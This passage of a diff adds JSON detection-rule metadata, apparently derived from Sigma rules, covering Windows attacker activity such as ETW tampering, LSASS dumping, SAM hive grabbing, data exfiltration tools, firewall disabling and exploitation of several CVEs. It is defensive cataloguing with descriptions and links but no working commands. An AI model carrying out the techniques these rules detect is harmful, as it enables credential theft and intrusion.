+ "https://abuse.io/lockergoga.txt", + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" + ], + "creation_date": "2019/03/22", + "filename": "proc_creation_win_etw_trace_evasion.yml", + "author": "@neu5ron, Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "value": "WinRM Access with Evil-WinRM", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", + "https://github.com/Hackplayers/evil-winrm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_evil_winrm.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ], + "creation_date": "2022/01/07", + "filename": "proc_creation_win_evil_winrm.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.", + "uuid": "344482e4-a477-436c-aa70-7536d18a48c7", + "value": "Execution via MSSQL Xp_cmdshell Stored Procedure", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/09/28", + "filename": "proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execution of well known tools for data exfiltration and tunneling", + "uuid": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", + "value": "Exfiltration and Tunneling Tools Execution", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate Administrator using tools" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of various cli utility related to web request exfiltrating data", + "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "value": "Possible Exfiltration Of Data Via CLI", + "meta": { + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/08/02", + "filename": "proc_creation_win_exfil_data_via_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "uuid": "9f107a84-532c-41af-b005-8d12a607639f", + "value": "Cabinet File Expansion", + "meta": { + "refs": [ + "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2021/07/30", + "filename": "proc_creation_win_expand_cabinet_files.yml", + "author": "Bhabesh Raj", + "level": "medium", + "falsepositive": [ + "System administrator Usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "uuid": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "value": "Exploit for CVE-2015-1641", + "meta": { + "refs": [ + "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", + "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2018/02/22", + "filename": "proc_creation_win_exploit_cve_2015_1641.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", + "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "value": "Exploit for CVE-2017-0261", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2018/02/22", + "filename": "proc_creation_win_exploit_cve_2017_0261.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", + "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "value": "Droppers Exploiting CVE-2017-11882", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", + "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2017/11/23", + "filename": "proc_creation_win_exploit_cve_2017_11882.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905", + "value": "Exploit for CVE-2017-8759", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2017/09/15", + "filename": "proc_creation_win_exploit_cve_2017_8759.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "value": "Exploiting SetupComplete.cmd CVE-2019-1378", + "meta": { + "refs": [ + "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" + ], + "creation_date": "2019/11/15", + "filename": "proc_creation_win_exploit_cve_2019_1378.yml", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "value": "Exploiting CVE-2019-1388", + "meta": { + "refs": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", + "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2019/11/20", + "filename": "proc_creation_win_exploit_cve_2019_1388.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7", + "value": "Exploited CVE-2020-10189 Zoho ManageEngine", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" + ], + "creation_date": "2020/03/25", + "filename": "proc_creation_win_exploit_cve_2020_10189.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects new commands that add new printer port which point to suspicious file", + "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "meta": { + "refs": [ + "https://windows-internals.com/printdemon-cve-2020-1048/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/05/13", + "filename": "proc_creation_win_exploit_cve_2020_1048.yml", + "author": "EagleEye Team, Florian Roth", + "level": "high", + "falsepositive": [ + "New printer port install on host" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "value": "DNS RCE CVE-2020-1350", + "meta": { + "refs": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2020/07/15", + "filename": "proc_creation_win_exploit_cve_2020_1350.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown but benign sub processes of the Windows DNS service dns.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a cmd.exe with LOCAL_SYSTEM rights", + "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61", + "value": "Possible InstallerFileTakeOver LPE CVE-2021-41379", + "meta": { + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2021/11/22", + "filename": "proc_creation_win_exploit_lpe_cve_2021_41379.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM", + "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "value": "SystemNightmare Exploitation Script Execution", + "meta": { + "refs": [ + "https://github.com/GossiTheDog/SystemNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2021/08/11", + "filename": "proc_creation_win_exploit_systemnightmare.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Rename as a legitimate Sysinternals Suite tool to evade detection", + "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "value": "False Sysinternals Suite Tools", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_false_sysinternalsuite.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ], + "creation_date": "2021/12/20", + "filename": "proc_creation_win_false_sysinternalsuite.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a file or folder's permissions being modified or tampered with.", + "uuid": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "value": "File or Folder Permissions Modifications", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ], + "creation_date": "2019/10/23", + "filename": "proc_creation_win_file_permission_modifications.yml", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "value": "Findstr GPP Passwords", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ], + "creation_date": "2021/12/27", + "filename": "proc_creation_win_findstr_gpp_passwords.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "value": "Findstr LSASS", + "meta": { + "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ], + "creation_date": "2022/08/12", + "filename": "proc_creation_win_findstr_lsass.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of findstr with the \"EVERYONE\" keyword. This is often used in combination with icacls to look for misconfigured files or folders permissions", + "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", + "value": "Suspicious Recon Activity Using Findstr Keywords", + "meta": { + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ], + "creation_date": "2022/08/12", + "filename": "proc_creation_win_findstr_recon_everyone.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "value": "Windows Firewall Disabled via PowerShell", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_firewall_disabled_via_powershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2022/09/14", + "filename": "proc_creation_win_firewall_disabled_via_powershell.yml", + "author": "Tim Rauch", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", + "value": "Fast Reverse Proxy (FRP)", + "meta": { + "refs": [ + "https://asec.ahnlab.com/en/38156/", + "https://github.com/fatedier/frp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2022/09/02", + "filename": "proc_creation_win_frp.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Attackers may leverage fsutil to enumerated connected drives.", + "uuid": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", + "value": "Fsutil Drive Enumeration", + "meta": { + "refs": [ + "Turla has used fsutil fsinfo drives to list connected drives. https://attack.mitre.org/techniques/T1120/", + "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1120" + ], + "creation_date": "2022/03/29", + "filename": "proc_creation_win_fsutil_drive_enumeration.yml", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "level": "low", + "falsepositive": [ + "Certain software or administrative tasks may trigger false positives." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "value": "Fsutil Behavior Set SymlinkEvaluation", + "meta": { + "refs": [ + "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", + "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/03/02", + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", + "meta": { + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ], + "creation_date": "2022/10/10", + "filename": "proc_creation_win_get_localgroup_member_recon.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution GMER tool based on image and hash fields.", + "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "value": "GMER - Rootkit Detector and Remover Execution", + "meta": { + "refs": [ + "http://www.gmer.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gmer_execution.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/10/05", + "filename": "proc_creation_win_gmer_execution.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", + "value": "Use of GoToAssist Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gotoopener.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/13", + "filename": "proc_creation_win_gotoopener.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "value": "Gpg4Win Decrypt Files From Suspicious Locations", + "meta": { + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/11/30", + "filename": "proc_creation_win_gpg4win_susp_usage.yml", + "author": "Nasreddine Bencherchali, X__Junior", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Dump sam, system or security hives using REG.exe utility", + "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "value": "Grabbing Sensitive Hives via Reg Utility", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_grabbing_sensitive_hives_via_reg.yml", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Windows hacktools based on their import hash (imphash) even if the files have been renamed", + "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "value": "Windows Hacktool Imphash", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml" + ], + "tags": "No established tags", + "creation_date": "2022/03/04", + "filename": "proc_creation_win_hacktool_imphashes.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of one of these tools" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", + "value": "ADCSPwn Hack Tool", + "meta": { + "refs": [ + "https://github.com/bats3c/ADCSPwn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1557.001" + ], + "creation_date": "2021/07/31", + "filename": "proc_creation_win_hack_adcspwn.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "value": "Bloodhound and Sharphound Hack Tool", + "meta": { + "refs": [ + "https://github.com/BloodHoundAD/BloodHound", + "https://github.com/BloodHoundAD/SharpHound", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/12/20", + "filename": "proc_creation_win_hack_bloodhound.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other programs that use these command line option and accepts an 'All' parameter" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of tools created by a well-known hacktool producer named Cube0x0, which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec etc.)", + "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "value": "Hacktool by Cube0x0", + "meta": { + "refs": [ + "https://github.com/cube0x0", + "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" + ], + "tags": "No established tags", + "creation_date": "2022/04/27", + "filename": "proc_creation_win_hack_cube0x0_tools.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "value": "Dumpert Process Dumper", + "meta": { + "refs": [ + "https://github.com/outflanknl/Dumpert", + "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2020/02/04", + "filename": "proc_creation_win_hack_dumpert.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command line parameters used by Hydra password guessing hack tool", 